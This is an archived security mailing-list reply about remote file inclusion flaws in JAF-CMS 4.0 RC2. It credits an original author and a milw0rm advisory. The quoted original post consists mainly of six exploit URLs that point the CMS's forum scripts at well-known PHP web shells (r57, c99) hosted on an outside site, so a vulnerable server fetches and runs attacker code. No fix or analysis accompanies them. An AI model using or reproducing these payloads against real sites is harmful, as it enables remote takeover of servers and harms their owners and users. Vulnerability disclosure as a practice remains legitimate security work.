[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities

To: r57blg@xxxxxxxxx
Subject: Re: JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities
From: str0ke <str0ke@xxxxxxxxxxx>
Date: Thu, 27 Mar 2008 11:42:51 -0500

Original author:

CraCkEr


Original advisory
http://milw0rm.com/exploits/5317

/str0ke

r57blg@xxxxxxxxx wrote:
>  JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities 
>
>
> [+] Author : XxX
>
> [+] Site : www.wikipediatr.com
>
> ==============================================
>
> Exploit :         
> http://localhost/path/module/forum/forum.php?website=http://www.r57shell.in/r57.txt?
>        
>         
> http://localhost/path/module/forum/forum.php?main_dir=http://www.r57shell.in/c99.txt?
>         
> http://localhost/path/module/forum/headlines.php?website=http://www.r57shell.in/erne.txt?
>         
> http://localhost/path/module/forum/headlines.php?main_dir=http://www.r57shell.in/r57.txt?
>         
> http://localhost/path/module/forum/main.php?website=http://www.r57shell.in/c99.txt?
>         
> http://localhost/path/module/forum/main.php?main_dir=http://www.r57shell.in/erne.txt?
>
>

References:
- JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities
  - From: r57blg

Prev by Date: [SECURITY] [DSA 1531-1] New policyd-weight packages fix insecure temporary files
Next by Date: Re: [securityreason] *BSD libc (strfmon) Multiple vulnerabilities
Previous by thread: JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities
Next by thread: [SECURITY] [DSA 1531-1] New policyd-weight packages fix insecure temporary files
Index(es):
- Date
- Thread